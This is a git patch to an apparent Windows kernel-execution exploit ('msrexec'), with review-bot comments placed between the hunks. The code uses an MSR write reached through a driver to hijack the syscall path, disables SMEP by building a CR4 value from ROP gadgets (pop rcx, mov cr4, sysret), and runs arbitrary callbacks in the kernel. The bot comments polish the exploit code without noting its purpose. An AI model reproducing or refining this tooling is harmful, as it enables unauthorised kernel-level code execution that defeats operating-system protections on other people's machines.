From 88a6dcf42cc81d55f4403b2dc652c72ea59f7c82 Mon Sep 17 00:00:00 2001 From: _xeroxz Date: Sun, 21 Feb 2021 18:10:03 -0800 Subject: [PATCH] working in vm... testing on metal.. --- main.cpp | 36 ++++++++++++++---------------------- msrexec.cpp | 21 ++++----------------- msrexec.vcxproj.filters | 6 +++--- syscall_handler.h | 14 ++++++++++++++ 4 files changed, 35 insertions(+), 42 deletions(-) create mode 100644 syscall_handler.h diff --git a/main.cpp b/main.cpp index 862cf54..46d4246 100644 --- a/main.cpp +++ b/main.cpp @@ -19,35 +19,27 @@ int __cdecl main(int argc, char** argv) std::printf("NtShutdownSystem -> 0x%p\n", utils::kmodule::get_export("ntoskrnl.exe", "NtShutdownSystem")); writemsr_t _write_msr = - [&](std::uint32_t reg, std::uintptr_t value) -> void + [&](std::uint32_t reg, std::uintptr_t value) -> bool { // put your code here to write MSR.... // the code is defined in vdm::writemsr for me... - vdm::writemsr(reg, value); + return vdm::writemsr(reg, value); }; - const auto ex_alloc_pool = - reinterpret_cast( - utils::kmodule::get_export( - "ntoskrnl.exe", "ExAllocatePool")); - - const auto dbg_print = - reinterpret_cast( - utils::kmodule::get_export( - "ntoskrnl.exe", "DbgPrint")); - vdm::msrexec_ctx msrexec(_write_msr); - std::printf("press enter to run 100 syscall tests...\n"); - std::getchar(); - - for (auto idx = 0u; idx < 100; ++idx) + msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void { - msrexec.exec([&ex_alloc_pool, &dbg_print]() -> void - { - dbg_print("> allocated pool -> 0x%p\n", - ex_alloc_pool(NULL, 0x1000)); - }); - } + const auto dbg_print = + reinterpret_cast( + get_kroutine(krnl_base, "DbgPrint")); + + const auto ex_alloc_pool = + reinterpret_cast( + get_kroutine(krnl_base, "ExAllocatePool")); + + dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000)); + dbg_print("> cr4 -> 0x%p\n", __readcr4()); + }); const auto unload_result = vdm::unload_drv(drv_handle, drv_key); 
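Review bot: The new `dbg_print("> cr4 -> 0x%p\n", __readcr4());` line passes an unsigned 64-bit integer to a `%p` conversion, which expects a pointer; use a matching integer conversion instead, e.g. `dbg_print("> cr4 -> 0x%llx\n", __readcr4());`. The `_write_msr` lambda now forwards the `bool` from `vdm::writemsr`, but nothing in the hunk inspects the outcome of `msrexec.exec(...)`, so if `exec` surfaces that result a failed MSR write passes silently here; checking the return value (if `exec` has one) or logging it would make the failure mode visible. The block returned by `ex_alloc_pool(NULL, 0x1000)` is never released within the hunk, so each run of the test leaks that pool allocation. The body of `main` starts before and ends after this hunk.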
diff --git a/msrexec.cpp b/msrexec.cpp index 9d0e407..4c58ec5 100644 --- a/msrexec.cpp +++ b/msrexec.cpp @@ -29,34 +29,17 @@ namespace vdm cpuid_eax_07 cpuid_features; __cpuid((int*)&cpuid_features, 7); - // if i dont set a bit, it means its 0... cr4 cr4_value{}; - cr4_value.debugging_extensions = true; cr4_value.page_size_extensions = true; cr4_value.machine_check_enable = true; - // however the system can still *not* have PAE enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.physical_address_extension = cpuid_info.cpuid_feature_information_edx.physical_address_extension; - // again the system can still *not* have PGE enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... - cr4_value.page_global_enable = - cpuid_info.cpuid_feature_information_edx.page_global_bit; - - // again the system can still *not* have FXSAVE/FXRSTOR enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.os_fxsave_fxrstor_support = cpuid_info.cpuid_feature_information_edx.fxsave_fxrstor_instructions; - // windows has this bit high on my VM so I - // assume windows can handle these exceptions... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.os_xmm_exception_support = true; cr4_value.fsgsbase_enable = @@ -65,6 +48,10 @@ namespace vdm cr4_value.os_xsave = IsProcessorFeaturePresent(PF_XSAVE_ENABLED); + cr4_value.pcid_enable = + cpuid_info.cpuid_feature_information_ecx + .process_context_identifiers; + m_smep_off.flags = cr4_value.flags; m_smep_off.smep_enable = false; diff --git a/msrexec.vcxproj.filters b/msrexec.vcxproj.filters index cadbdfc..01940b5 100644 --- a/msrexec.vcxproj.filters +++ b/msrexec.vcxproj.filters @@ -17,9 +17,6 @@ Header Files - - Header Files - Header Files 
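Review bot: The first msrexec.cpp hunk deletes the comments that recorded `physical_address_extension`, `os_fxsave_fxrstor_support` and `os_xmm_exception_support` as assumptions (CPUID support taken to mean Windows enabled the feature) while keeping the assumptions themselves, and the second hunk adds `pcid_enable` from `cpuid_feature_information_ecx.process_context_identifiers` with the same unstated assumption; `page_global_enable` is removed outright, and nothing in the visible hunks sets it, so that bit stays clear in the zero-initialized `cr4_value`. Since `m_smep_off.flags` is built from this synthesized value rather than from the live register, a reader needs to know these are guesses: restore one comment above the block, e.g. `// cr4_value is reconstructed from CPUID/IsProcessorFeaturePresent, not read from the live CR4; feature support is assumed to mean the OS enabled it.` The enclosing function starts before the first hunk and continues after the second.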
@@ -32,6 +29,9 @@ Header Files + + Header Files + diff --git a/syscall_handler.h b/syscall_handler.h new file mode 100644 index 0000000..153ae0b --- /dev/null +++ b/syscall_handler.h @@ -0,0 +1,14 @@ +#pragma once +#include "ia32.hpp" + +extern "C" std::uint32_t m_kpcr_rsp_offset; +extern "C" std::uint32_t m_kpcr_krsp_offset; + +extern "C" std::uintptr_t m_pop_rcx_gadget; +extern "C" std::uintptr_t m_mov_cr4_gadget; +extern "C" std::uintptr_t m_sysret_gadget; + +extern "C" cr4 m_smep_on; +extern "C" cr4 m_smep_off; +extern "C" std::uintptr_t m_system_call; +extern "C" void syscall_wrapper(...); \ No newline at end of file
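Review bot: syscall_handler.h uses `std::uint32_t` and `std::uintptr_t` but includes only `"ia32.hpp"`, so it compiles only if that header happens to pull in `<cstdint>`; add `#include <cstdint>` after the `#pragma once` so the header is self-contained. The nine `extern "C"` declarations carry no comment saying where they are defined or what consumes them (the C linkage and the `syscall_wrapper(...)` signature suggest an assembly file, but that is not visible here); a one-line header comment naming the defining translation unit would help the next reader. The file also lacks a trailing newline.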